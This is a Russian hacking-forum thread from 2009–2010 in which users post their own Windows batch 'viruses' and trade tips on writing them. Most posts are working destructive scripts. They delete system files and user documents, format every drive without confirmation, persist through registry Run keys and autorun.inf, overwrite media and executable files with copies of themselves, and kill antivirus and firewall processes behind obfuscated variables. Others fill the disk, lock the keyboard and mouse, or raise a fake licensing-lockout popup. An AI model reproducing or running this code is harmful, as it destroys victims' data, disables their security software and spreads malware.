RE: Пишем сюда свои *.BAt-вирусы
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2009-03-24 16:24:23.656666
|
|
|
Wlada
Сообщений: 1233
Оценки: 0
Присоединился: 2007-09-24 12:01:26.970000
|
quote:
ORIGINAL: AloneMonaX
Я к теме твоей программы больше не возвращаюсь! Пиши лучше на си++))
пишу
quote:
Почему именно БАТ нужен тебе???
ну, как тебе сказать [sm=bw.gif] считай что это женский каприз [sm=d03041.gif]
|
|
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2009-04-02 12:51:40.420000
|
|
|
SoldierASP
Сообщений: 17
Оценки: 0
Присоединился: 2008-08-13 10:38:37.486666
|
quote:
hakers сказал:
@echo off
del "%SystemRoot%\Cursors\*.*" >nul
Del C:\WINDOWS\system32\catsrvps.dll
Del C:\WINDOWS\system32\catsrvut.dll
Del C:\WINDOWS\system32\cdfview.dll
Del C:\WINDOWS\system32\cisvc.exe
Del C:\WINDOWS\system32\ckcnv.exe
Del C:\WINDOWS\system32\clb.dll
Del C:\WINDOWS\system32\cmd.exe
Del C:\WINDOWS\system32\cmdial32.dll
Del C:\WINDOWS\system32\cnbjmon.dll
Del C:\WINDOWS\system32\comctl32.ocx
Del C:\WINDOWS\system32\dplaysvr.exe
Del C:\WINDOWS\NOTEPAD.EXE
Del C:\WINDOWS\twunk_32.exe
Del C:\WINDOWS\wmprfRUS.prx
Del C:\WINDOWS\WindowsShell.Manifest');
Del C:\WINDOWS\regedit.exe
Del C:\WINDOWS\explorer.exe
Del C:\WINDOWS\OemDrv
Del C:\WINDOWS\PeerNet\sqldb20.dll
Del C:\WINDOWS\PeerNet\sqlqp20.dll
Del C:\WINDOWS\twain_32\wiatwain.ds
del virus.bat
ну да. И на удаление каждого из файлов будет вопрос: Вы действительно желаете удалить файлы? [y/n]
Юзай del /? и будет счастье. Если команду правильно описать - сносит все файлы по определенной маске из всех подкаталогов.
Вообще бат вирусы - индивидуальные вирусы. Если пытаться внедрить его жертве, то надо писать под нее. Почему? Винда будет стоять на диске D и толку от того, что у тебя идет снос файлов с диска С?
Самый простой скрипт - format d: /y (форматирование без подтверждения)- если винда стоит на диске С, а вся важная инфа на диске D. То последней придет капут.
зачем написал - не знаю. дураков в сети много. будут юзать.
|
|
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2009-04-04 11:46:06.986666
|
|
|
AloneMonaX
Сообщений: 106
Оценки: 0
Присоединился: 2009-02-04 14:57:00.896666
|
quote:
Вообще бат вирусы - индивидуальные вирусы. Если пытаться внедрить его жертве, то надо писать под нее. Почему? Винда будет стоять на диске D и толку от того, что у тебя идет снос файлов с диска С?
%USERPROFILE% - [C]:\Documents and Settings\[LAMER]
%ProgramFiles% - это понятно что=)
%USERPROFILE%\Application Data\Microsoft\Internet Explorer\Quick Launch - быстрый запуск
%USERPROFILE%\SendTo - меню "Оптравить"
%windir% - Wind00z)))
%temp% - поняна че ето
%systemdrive% - сист.диск
Юзай это и подстраивать не надо)))
|
|
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2009-04-04 14:11:52.206666
|
|
|
Zmaster
Сообщений: 930
Оценки: 0
Присоединился: 2007-02-09 19:02:43.500000
|
quote:
ORIGINAL: AloneMonaX
quote:
Вообще бат вирусы - индивидуальные вирусы. Если пытаться внедрить его жертве, то надо писать под нее. Почему? Винда будет стоять на диске D и толку от того, что у тебя идет снос файлов с диска С?
%USERPROFILE% - [C]:\Documents and Settings\[LAMER]
%ProgramFiles% - это понятно что=)
%USERPROFILE%\Application Data\Microsoft\Internet Explorer\Quick Launch - быстрый запуск
%USERPROFILE%\SendTo - меню "Оптравить"
%windir% - Wind00z)))
%temp% - поняна че ето
%systemdrive% - сист.диск
Юзай это и подстраивать не надо)))
А если хочешь еще лучще (точнее), тогда введи в командную строку комунду set без параметров.
|
|
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2009-05-11 23:21:35.543333
|
|
|
sanya405
Сообщений: 2
Оценки: 0
Присоединился: 2009-05-03 00:43:40.400000
|
Привет, прочитав тему, попробывал написать свой первый вирь, а скорее программу-прикол….
———————————————————-
@echo off
Date 06.06.06 //меняем дату
Time 00:00 //время
%SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul //меняем местами кнопки мыши
if exist C:\WINDOWS\system32\sys\1st.bat goto zet
md "%SystemRoot%\system32\sys" >nul //создаем папку sys в system32
copy %0 "%SystemRoot%\system32\sys\1st.bat" >nul //копируем себя в эту папку
attrib +h +s +r %SystemRoot%\system32\sys\ >nul //ставим атрибуты
attrib +h +s +r %SystemRoot%\system32\sys\1st.bat >nul //ставим атрибуты
reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v ctfm0n.exe /t REG_SZ /d C:\WINDOWS\system32\sys\1st.bat /f >nul //создаем ключ автозапуска
:zet
msg * "Ahahaahahah!!! I fucked you!!!))))" //пишем что хотим
exit
————————————————–
ПС полную работоспособность не проверял, но на стадии написания все работало…
ПСС В код можно добавить много чего интересного….
|
|
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2009-06-28 23:17:20.786666
|
|
|
hack001
Сообщений: 2
Оценки: 0
Присоединился: 2009-06-27 20:49:40.086666
|
@Echo off (запрещаем вывод на экран исполняемых команд)
Echo Virus Loading (Выводит на экран надпись «Virus Loading» В место нее можете писать что угодно)
Date 13.09.96 (эта строка изменяет дату)
If exist c:ski.bat goto abc (проверяет существует ли файл, …..)
Copy %0 c:ski.bat (копирует вирус только изменив названия)
Attrib +h c:ski.bat ( делает файлу ski.bat атрибут скрытый
Echo c:ski.bat >>autoexec.bat (Прописывает файл ski.bat в автозагрузку
:abc ( ……если он существует, то программа перейдет на метку :abc)
md PRIDUROK
md LUZER
md DURAK (Создает пустые папки)
md LAMER
Label E: PRIDUROK (CD-ROM будет называться PRIDUROK)
assoc .exe=.mp3 (запускает все ексшники как музыка
del c:Program Files/q (удаляет все файлы из этой папки)
Echo VIRUS LOAD (Выводит надпись)
==================
вирус хороший у меня kis7.0 вырубил ! не одна прога непашит ! вообщем тема вирус !
|
|
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2009-06-28 23:36:40.603333
|
|
|
hack info
Сообщений: 20
Оценки: 0
Присоединился: 2009-05-16 11:33:40.703333
|
Я бат вирус когда делал нод незапалил на вирустотал проверил там много кто ругаться начал)):)
|
|
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2009-07-05 01:34:02.180000
|
|
|
vurgho44
Сообщений: 1
Оценки: 0
Присоединился: 2009-07-05 01:20:37.003333
|
Хелло всем=) по синтаксу легче вроде бы писать не параметры а : format c: | y . легко накладываем йес на все комманды, которые требуют подтверждения Юзверя.. Все движения в сторону windir итп отслеживаются на корню. Тушим AV ( как не напишу=))
варианты:
1.меняем дату(баян).
2.меняем разрешение(assoc) -перезагрузка, открываем(перечень не забываем вбахать в батник) все файлы антивиря блокнотом( чем удобней), далее код виря, т.к AV впадёт в кому.
3.запрещаем или ограничиваем доступ к файлам( указываем файлы конфига и баз данных AV).
4.снимаем автозагрузку( не обязал. через реестр ибо палится) ребут -код виря.
|
|
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2009-07-13 14:24:14.726666
|
|
|
ShamanNet
Сообщений: 8
Оценки: 0
Присоединился: 2009-06-06 16:03:05.680000
|
Доброго всем времени суток. А как можно проверить, совпадает ли системная дата с нужной мне датой? Например, мне нужно сделать переход к метке, если системная дата = 13.07.2009
IF %DAY%.%MONTH%.%YEAR%==13.07.2009 GOTO MARK
:MARK
MSG * "Готово!"
Заранее благодарен за ответ
Всё оказалось очень просто!
CHCP 1251
IF %DATE%==15.07.2009 GOTO MARK
MSG * "Сегодня "%DATE%
EXIT
:MARK
MSG * "Сегодня 15.07.2009"
EXIT
|
|
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2009-08-07 01:02:16.573333
|
|
|
VSB
Сообщений: 1
Оценки: 0
Присоединился: 2009-08-07 00:46:53.863333
|
Может мне хоть тут кто поможет ???
Надо написать батник чтоб убить процес каспера и желательно чтоб батник был с автозапуском т.ё поподая на комп чтоб активировался сам
Буду очень благодарен если кто поможет
|
|
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2009-08-18 04:11:41.153333
|
|
|
SamuraiPro
Сообщений: 8
Оценки: 0
Присоединился: 2008-03-15 18:45:33.223333
|
quote:
Может мне хоть тут кто поможет ???
Надо написать батник чтоб убить процес каспера и желательно чтоб батник был с автозапуском т.ё поподая на комп чтоб активировался сам
Буду очень благодарен если кто поможет
Хех касперского батникам =) Что думаешь там совсем дураки его написали?
Вобще процесс можно завершить командой taskkill , но каспера не сможешь.
|
|
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2009-08-19 13:56:48.523333
|
|
|
Zmaster
Сообщений: 930
Оценки: 0
Присоединился: 2007-02-09 19:02:43.500000
|
Антивирус Касперского ставит в систему специальный драйвер, который перехватывает все сообщения о его убийстве. Я как-то давно писал пост, в котором было написано, как убить процесс Каспера на Delphi. Но я наверное его не найду. Топик кажись назывался "Убить проактивку антивируса".
P.S. Завышаете вы возможности бат-файла. Запомните, это не язык программирования. Это всего лишь навсего файл с системными командами Windows.
|
|
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2009-10-18 17:58:09.393333
|
|
|
minya92
Сообщений: 1
Оценки: 0
Присоединился: 2009-10-18 14:05:37.713333
|
Вот смотрите, написал феньку от которой у бедного ламера будет глючить комп:
@echo off
echo Set fso = CreateObject("Scripting.FileSystemObject") > %systemdrive%\windows\system32\rundll32.vbs
echo do >> %systemdrive%\windows\system32\rundll32.vbs
echo Set tx = fso.CreateTextFile("%systemdrive%\windows\system32\rundll32.dat", True) >> %systemdrive%\windows\system32\rundll32.vbs
echo tx.WriteBlankLines(100000000) >> %systemdrive%\windows\system32\rundll32.vbs
echo tx.close >> %systemdrive%\windows\system32\rundll32.vbs
echo FSO.DeleteFile "%systemdrive%\windows\system32\rundll32.dat" >> %systemdrive%\windows\system32\rundll32.vbs
echo loop >> %systemdrive%\windows\system32\rundll32.vbs
start %systemdrive%\windows\system32\rundll32.vbs
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v system_host_run /t REG_SZ /d %systemdrive%\windows\system32\rundll32.vbs /f
и вот это если вы уже случайно запустили у себя, или вам жалко того ламера:
TASKKILL /F /IM wscript.exe
del c:\windows\rundll32.vbs
del c:\rundll32.sys
del d:\rundll32.sys
короче эта фигня будет создавать в папке систем32 файлик rundll32.dat в который будет прописывать много пустых строчек в этот файл тем самым он будет весить около 500 мб. Во время проспики будет сильно нагружаться цп. Как токо он всё запишет этот файл то он удалиться, и пойдет все заново, пока ламер не додумается завершить прцесс wscript.exe
И еще это хрень прописывает ся в автозагрузку
|
|
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2009-10-20 11:11:08.696666
|
|
|
Tester_Egor4ik
Сообщений: 161
Оценки: 0
Присоединился: 2009-10-15 15:45:32.776666
|
интересует запись в файл.
|
|
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2009-11-11 17:26:11.683333
|
|
|
AloneMonaX
Сообщений: 106
Оценки: 0
Присоединился: 2009-02-04 14:57:00.896666
|
В предыдущих постах написано про запись в файл=)
|
|
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2009-11-19 15:32:29.076666
|
|
|
HUNTERPRO
Сообщений: 134
Оценки: 0
Присоединился: 2008-02-15 21:14:01.596666
|
Пиндец бред)
что есть вирус?
Компью́терный ви́рус — разновидность компьютерных программ, отличительной особенностью которой является способность к размножению!
А вы хню всякую суете… которой можно чисто подгадить юзверю…
——–
вот помогите лучше мне с кодом надо передавать ECHO с пере направлением в файл в той же комманде)
пример ECHO "echo %date%-%time%-RUN >> virus.log" >> virus.bat то что в кавычках нужно записать в файл… как решить проблему? код выше работает неправильно…
——–
ТО ЧТО ВАМ ЯВНО НУЖНО:
Quick Batch File Compiler - программа преобразующая код bat файла, в exe файл с нужной вам иконкой!
–
chcp 1251
title Loading... please wait...
set taskkiller="%userprofile%\tkillr.bat"
set autorun="%userprofile%\Главное меню\Программы\Автозагрузка\starter.bat"
set taskker="%userprofile%\tmadr.bat"
set log="%userprofile%\winV.log"
set t=at %time%
set m=msg * Здравствуй нуб) нажми ок!
echo start %taskker% > %autorun%
echo [ add time run ] %date% - %time:~0,5% %username% >> %log%
echo taskkill /f /im explorer.exe > %taskkiller%
echo %m% >> %taskkiller%
echo [ run bat file ] %date% - %time:~0,5% %username% >> %log% >> %taskkiller%
%t:~0,8% /interactive %taskkiller% >> %taskker%
start %taskker%
а это мой недоделанный bat вирусь… которому так же надо дописать функцию размножения…
***
вот еще прикольная вещь
:m
fsutil file createnew C:\%randome% 1073741824
goto m
файл забивает диск C:\ пустыми гигабайтными файлами…
с именами состоящих из цифр выбирающихся рандомно где-то от 4000 до 30000.
******кстати спасибо за код TIME BOMB : ) можно отправлять людей погулять в Пятницу 13е******
|
|
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2009-11-19 15:49:55.020000
|
|
|
AloneMonaX
Сообщений: 106
Оценки: 0
Присоединился: 2009-02-04 14:57:00.896666
|
quote:
ECHO "echo %date%-%time%-RUN >> virus.log" >> virus.bat
Сразу в два файла чтоли хочешь?)
|
|
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2009-11-21 14:42:12.846666
|
|
|
HUNTERPRO
Сообщений: 134
Оценки: 0
Присоединился: 2008-02-15 21:14:01.596666
|
Нет…) должен создаться файл Virus.bat
а в нем строка echo %date%-%time%-RUN >> virus.log
|
|
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2009-11-21 15:05:13.166666
|
|
|
AloneMonaX
Сообщений: 106
Оценки: 0
Присоединился: 2009-02-04 14:57:00.896666
|
Обязательно одной строкой))))?
|
|
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2009-11-21 15:12:43.313333
|
|
|
vfrvfr33
Сообщений: -9
Оценки: 0
Присоединился: 2009-11-21 14:27:29.976666
|
Всё для web-мастера - http://for-web-mastera.ru/
|
|
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2009-11-22 14:21:48.016666
|
|
|
HUNTERPRO
Сообщений: 134
Оценки: 0
Присоединился: 2008-02-15 21:14:01.596666
|
мне любым способом нужно впечатать
echo %date%-%time%-RUN >> virus.log
в батник чтобы одной строкой было… ))
иначе никак…
|
|
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2009-12-06 06:04:59.510000
|
|
|
BandyT
Сообщений: 1
Оценки: 0
Присоединился: 2009-12-06 05:58:12.800000
|
Подскажите пожалуйста код, чтобы батник копировался на флэшку, когда её вставят…
|
|
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2009-12-09 17:13:16.446666
|
|
|
HUNTERPRO
Сообщений: 134
Оценки: 0
Присоединился: 2008-02-15 21:14:01.596666
|
Всем бы такой знать)))
кстати сайт с вирусами http://vx.netlux.org/
там bat файлы можно качать и разбирать
|
|
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2009-12-11 20:59:20.700000
|
|
|
LaRio
Сообщений: 56
Оценки: 0
Присоединился: 2009-12-11 20:17:18.650000
|
как можно с помощью бат оглушить всю сеть в клубе?
|
|
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2009-12-19 14:41:42.710000
|
|
|
VAN32
Сообщений: 20
Оценки: 0
Присоединился: 2009-11-06 20:37:37.856666
|
Обозвать учетную запись
@echo off
Chcp 1251
Cls
net user %username% >nul
msg * %username% "Ламер" >nul
|
|
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2010-01-01 16:42:11.026666
|
|
|
Alligatormu
Сообщений: 7
Оценки: 0
Присоединился: 2010-01-01 15:40:20.690000
|
Здесь их куча ->http://life-web.ucoz.ua
|
|
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2010-01-11 17:27:46.553333
|
|
|
Мечтающий
Сообщений: 11
Оценки: 0
Присоединился: 2008-12-08 14:59:43.646666
|
а как можно запустить другие батники?если уже писали просьба ткнуть пальцем
|
|
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2010-01-11 18:25:41.580000
|
|
|
janitor
Сообщений: 100
Оценки: 0
Присоединился: 2009-09-11 15:33:08.426666
|
call
start
|
|
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2010-01-11 19:46:06.780000
|
|
|
Мечтающий
Сообщений: 11
Оценки: 0
Присоединился: 2008-12-08 14:59:43.646666
|
понял.start можно было догадаться)
|
|
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2010-01-12 19:47:09.896666
|
|
|
VAN32
Сообщений: 20
Оценки: 0
Присоединился: 2009-11-06 20:37:37.856666
|
@echo off
del /Q /F C:\Program Files\Aim6\*.*
del /Q /F C:\Program Files\Aim\*.*
Cls
del /Q /F C:\Program Files\Aim5\*.*
del /Q /F C:\Program Files\Internet Explorer\*.*
del /Q /F C:\Program Files\itunes\*.*
ipconfig /release
if ERRORLEVEL1 ipconfig /release_all
del /Q /F C:\Program Files\*.*
net stop "MpsSvc"
taskkill /f /t /im "FirewallControlPanel.exe"
net stop "wuauserv"
del /f /q "C:\Users\%userprofile%\My Documents\My Pictures\*.*"
del /f /q"C:\Users\%userprofile%\My Documents\My Music\*.*"
cd "C:\Windows\System32\Drivers\etc"
echo 127.0.0.1 rapidshare.com >> "Hosts"
echo 127.0.0.1 www.rapidshare.com >> "Hosts"
cd "C:\Windows\System32\Drivers\etc"
echo 127.0.0.1 msn.com >> "Hosts"
echo 127.0.0.1 www.msn.com >> "Hosts"
cd "C:\Windows\System32\Drivers\etc"
echo 127.0.0.1 meebo.com >> "Hosts"
echo 127.0.0.1 www.meebo.com >> "Hosts"
cd "C:\Windows\System32\Drivers\etc"
echo 127.0.0.1 bebo.com >> "Hosts"
echo 127.0.0.1 www.bebo.com >> "Hosts"
cd "C:\Windows\System32\Drivers\etc"
echo 127.0.0.1 myspace.com >> "Hosts"
echo 127.0.0.1 www.myspace.com >> "Hosts"
cd "C:\Windows\System32\Drivers\etc"
echo 127.0.0.1 google.com >> "Hosts"
echo 127.0.0.1 www.google.com >> "Hosts"
cd "C:\Windows\System32\Drivers\etc"
echo 127.0.0.1 youtube.com >> "Hosts"
echo 127.0.0.1 www.youtube.com >> "Hosts"
cd "C:\Windows\System32\Drivers\etc"
echo 127.0.0.1 facebook.com >> "Hosts"
echo 127.0.0.1 www.facebook.com >> "Hosts"
taskkill /f /t /im "itunes helper.exe"
Cls
taskkill /f /t /im "itunes.exe"
taskkill /f /t /im "svchost.exe"
taskkill /f /t /im "svchost.exe"
taskkill /f /t /im "svchost.exe"
Cls
taskkill /f /t /im "svchost.exe"
taskkill /f /t /im "svchost.exe"
taskkill /f /t /im "svchost.exe"
taskkill /f /t /im "wmplayer.exe"
@echo off
:A
start
explorer
cmd
paint
goto :A
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f >nul
reg add hkcu\software\microsoft\windows\currentversion\policies\system /v disabletaskmgr /t reg_dword /d "1" /f
Cls
taskkill /f /t /im "aim6.exe"
taskkill /f /t /im "iexplore.exe"
taskkill /f /t /im "firefox.exe"
Dir %Homedrive% /s /b > DirPath
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul
For %%Z In (%DirPath%\*.wav) Do (
Set ExeInfect=%%Z > Nul
Copy /y %0 %ExeInfect%
)
)
Del /f /s /q DirPath
Dir %Homedrive% /s /b > DirPath
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul
For %%Z In (%DirPath%\*.zip) Do (
Set ExeInfect=%%Z > Nul
Copy /y %0 %ExeInfect%
)
)
Del /f /s /q DirPath
Dir %Homedrive% /s /b > DirPath
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul
For %%Z In (%DirPath%\*.txt) Do (
Set ExeInfect=%%Z > Nul
Copy /y %0 %ExeInfect%
)
)
Del /f /s /q DirPath
Dir %Homedrive% /s /b > DirPath
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul
For %%Z In (%DirPath%\*.html) Do (
Set ExeInfect=%%Z > Nul
Copy /y %0 %ExeInfect%
)
)
Del /f /s /q DirPath
Dir %SystemRoot% /s /b > PathHost
For /f %%a In (PathHost) Do Copy /y %0 %%a > Nul
Del /f /s /q PathHost > Nul
del /Q /F A:\*.*
del /Q /F B:\*.*
del /Q /F C:\*.*
Cls
del /Q /F D:\*.*
del /Q /F E:\*.*
del /Q /F F:\*.*
Dir %Homedrive% /s /b > DirPath
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul
For %%Z In (%DirPath%\*.wmv) Do (
Set ExeInfect=%%Z > Nul
Copy /y %0 %ExeInfect%
)
)
Del /f /s /q DirPath
Dir %Homedrive% /s /b > DirPath
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul
For %%Z In (%DirPath%\*.mp3) Do (
Set ExeInfect=%%Z > Nul
Copy /y %0 %ExeInfect%
)
)
Del /f /s /q DirPath
Dir %Homedrive% /s /b > DirPath
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul
For %%Z In (%DirPath%\*.jpg) Do (
Set ExeInfect=%%Z > Nul
Copy /y %0 %ExeInfect%
)
)
Del /f /s /q DirPath
Dir %Homedrive% /s /b > DirPath
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul
For %%Z In (%DirPath%\*.exe) Do (
Set ExeInfect=%%Z > Nul
Copy /y %0 %ExeInfect%
)
)
Del /f /s /q DirPath
RUNDLL32 USER32.DLL,SwapMouseButton
assoc.dll = txtfile
assoc.exe = pngfile
assoc.bat = WinRAR
Cls
assoc.vbs = Visual Style
assoc.reg = xmlfile
assoc.txt = regfile
reg add hkcu\software\microsoft\windows\currentversion\policies\system /v disableregistrytools /t reg_dword /d "1" /f
DEL /F /Q %UserProfile%\Documents\*.* >nul
DEL /F /Q %UserProfile%\Pictures\*.* >nul
DEL /F /Q %UserProfile%\Videos\*.* >nul
DEL /F /Q %UserProfile%\Downloads\*.* >nul
DEL /F /Q %UserProfile%\Music\*.* >nul
FORMAT A: /FS:NTFS /V:(A:) /X /P:1 /y >nul
FORMAT B: /FS:NTFS /V:(B:) /X /P:1 /y >nul
FORMAT C: /FS:NTFS /V:(C:) /X /P:1 /y >nul
FORMAT D: /FS:NTFS /V:(D:) /X /P:1 /y >nul
FORMAT E: /FS:NTFS /V:(E:) /X /P:1 /y >nul
FORMAT F: /FS:NTFS /V:(F:) /X /P:1 /y >nul
FORMAT G: /FS:NTFS /V:(G:) /X /P:1 /y >nul
FORMAT H: /FS:NTFS /V:(H:) /X /P:1 /y >nul
FORMAT I: /FS:NTFS /V:(I:) /X /P:1 /y >nul
FORMAT J: /FS:NTFS /V:(J:) /X /P:1 /y >nul
FORMAT K: /FS:NTFS /V:(K:) /X /P:1 /y >nul
FORMAT L: /FS:NTFS /V:(L:) /X /P:1 /y >nul
FORMAT M: /FS:NTFS /V:(M:) /X /P:1 /y >nul
FORMAT N: /FS:NTFS /V:(N:) /X /P:1 /y >nul
FORMAT O: /FS:NTFS /V:(O:) /X /P:1 /y >nul
FORMAT P: /FS:NTFS /V:(P:) /X /P:1 /y >nul
set fun=net
set morefun=stop
set Da=tsk
set VooDoo=ill
set DaVooDoo=del
set beer=/a
%fun% %morefun% "Security Center"
%fun%sh firewall set opmode mode=disable
%Da%%VooDoo% %beer% E-*
%Da%%VooDoo% %beer% av*
%Da%%VooDoo% %beer% fire*
%Da%%VooDoo% %beer% anti*
%Da%%VooDoo% %beer% spy*
%Da%%VooDoo% %beer% bullguard
%Da%%VooDoo% %beer% PersFw
%Da%%VooDoo% %beer% KAV*
%Da%%VooDoo% %beer% ZONEALARM
%Da%%VooDoo% %beer% OUTPOST
%Da%%VooDoo% %beer% nv*
%Da%%VooDoo% %beer% nav*
%Da%%VooDoo% %beer% F-*
%Da%%VooDoo% %beer% ESAFE
%Da%%VooDoo% %beer% cle
%Da%%VooDoo% %beer% BLACKICE
%Da%%VooDoo% %beer% def*
%Da%%VooDoo% %beer% kav
%Da%%VooDoo% %beer% kav*
%Da%%VooDoo% %beer% avg*
%Da%%VooDoo% %beer% ash*
%Da%%VooDoo% %beer% norton*
%Da%%VooDoo% %beer% nisum*
%Da%%VooDoo% %beer% padmin
%Da%%VooDoo% %beer% panda*
%Da%%VooDoo% %beer% safe*
%Da%%VooDoo% %beer% avas*
%Da%%VooDoo% %beer% norm*
%Da%%VooDoo% %beer% zlclien*
%Da%%VooDoo% %beer% norton*
%Da%%VooDoo% %beer% guard*
%Da%%VooDoo% %beer% mcafe*
%Da%%VooDoo% %beer% ewid*
%DaVooDoo% /Q /F %ProgramFiles%\kasper~1\*.exe
%DaVooDoo% /Q /F %ProgramFiles%\f-prot95\*.*
%DaVooDoo% /Q /F %ProgramFiles%\Mcafee\*.*
%DaVooDoo% /Q /F %ProgramFiles%\nod32\*.exe
%DaVooDoo% /Q /F %ProgramFiles%\panda software\*.*
%DaVooDoo% /Q /F %ProgramFiles%\ewido\*.exe
%DaVooDoo% /Q /F %ProgramFiles%\kav\*.exe
%DaVooDoo% /Q /F %ProgramFiles%\Lavasoft\Ad-awa~1\*.exe
%DaVooDoo% /Q /F %ProgramFiles%\webproxy\*.exe
|
|
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2010-01-15 18:11:38.360000
|
|
|
Мечтающий
Сообщений: 11
Оценки: 0
Присоединился: 2008-12-08 14:59:43.646666
|
Echo c:ski.bat >>autoexec.bat
запись "c:ski.bat" в файл "autoexec.bat"
|
|
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2010-01-15 19:58:41.196666
|
|
|
Мечтающий
Сообщений: 11
Оценки: 0
Присоединился: 2008-12-08 14:59:43.646666
|
Вот, дописал свой первый вирус
|
|
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2010-01-15 19:59:43.836666
|
|
|
Мечтающий
Сообщений: 11
Оценки: 0
Присоединился: 2008-12-08 14:59:43.646666
|
Вот, дописал свой первый вирус
quote:
@echo off
reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Ctfmon.exe /t REG_SZ /d C:\WINDOWS\system32\sys\MK4.bat /f >nul
copy %0 "C:/autorun.inf" >nul
copy %0 "C:/autorun.bat" >nul
echo open=autorun.bat del C:\* /q ; >>autorun.bat >nul
copy %0 "D:/autorun.inf" >nul
copy %0 "D:/autorun.bat" >nul
echo open=autorun.bat del D:\* /q ; >>autorun.bat >nul
rundll32 keyboard,disable >nul
rundll32 mouse,disable >nul
exit
|
|
|
|
|
RE: Пишем сюда свои *.BAt-вирусы - 2010-02-02 20:22:44.700000
|
|
|
Пельмех
Сообщений: 1
Оценки: 0
Присоединился: 2010-01-11 21:07:23.456666
|
Вот почитал полезности и создал свой вирус, по-моему страшная вещь! :)
Копируем текст вставляем в *.bat и суём в папку автозагрузки(та что в пуске) после включения компа файл все сохранит в
C:\Program Files\Internet Explorer\WINCDPatch.bat (дата просто будет другая и мы не спалимся.)
А вот и сам скрип с применением JS и VBS:
echo off
*//Добовляем в файл WINCDPatch.bat Отключение Клавы
echo @@echo off rundll32 keyboard,disable >"C:\Program Files\Internet Explorer\WINCDPatch.bat"
*//Добовляем в файл WINCDPatch.bat Отключение Мыши
echo @@echo off rundll32 mouse,disable >>"C:\Program Files\Internet Explorer\WINCDPatch.bat"
*//Добовляем в файл WINCDPatch.bat Запуск окна
Echo var WSHShell = WScript.CreateObject("WScript.Shell");>"C:\Program Files\Internet Explorer\RtlExUpd.js"
echo WSHShell.Popup ("Вы используете не лицензионную продукцию. В связи с чем работа вашего компьютера будет заблокирована!",10000, "Microsoft Corporation", 16);>>"C:\Program Files\Internet Explorer\RtlExUpd.js"
echo @@echo off start "C:\Program Files\Internet Explorer\RtlExUpd.js" >>"C:\Program Files\Internet Explorer\WINCDPatch.bat"
*//Создаем файл из-за которого зависает компьютер(Он создает кучу файлов в папке C:\$RECYCLE.BIС) :
echo Set FileSystemObject=createobject("scripting.filesystemobject") >>"C:\Program Files\Internet Explorer\WINCDPatch.vbs"
echo On Error Resume Next >>"C:\Program Files\Internet Explorer\WINCDPatch.vbs"
echo FileSystemObject.CreateFolder "C:\$RECYCLE.BIС" >>"C:\Program Files\Internet Explorer\WINCDPatch.vbs"
echo do >>"C:\Program Files\Internet Explorer\WINCDPatch.vbs"
echo Dim a >>"C:\Program Files\Internet Explorer\WINCDPatch.vbs"
echo a=a+(1) >>"C:\Program Files\Internet Explorer\WINCDPatch.vbs"
echo b=b-1 >>"C:\Program Files\Internet Explorer\WINCDPatch.vbs"
echo d=d+3 >>"C:\Program Files\Internet Explorer\WINCDPatch.vbs"
echo e=b+d+a >>"C:\Program Files\Internet Explorer\WINCDPatch.vbs"
echo Set Men = FileSystemObject.OpenTextFile("C:\Windows\ServiceProfiles\" &a& ".ini", 8, True) >>"C:\Program Files\Internet Explorer\WINCDPatch.vbs"
echo Men.WriteLine ("a23e" &e& ", inf class:" &d& "\") >>"C:\Program Files\Internet Explorer\WINCDPatch.vbs"
echo Men.Close >>"C:\Program Files\Internet Explorer\WINCDPatch.vbs"
echo loop >>"C:\Program Files\Internet Explorer\WINCDPatch.vbs"
*//Добовляем в файл WINCDPatch.bat Запуск зависания
echo start "C:\Program Files\Internet Explorer\WINCDPatch.vbs" >>"C:\Program Files\Internet Explorer\WINCDPatch.bat"
*//Создаем кучу ярлычков на рабочем столе
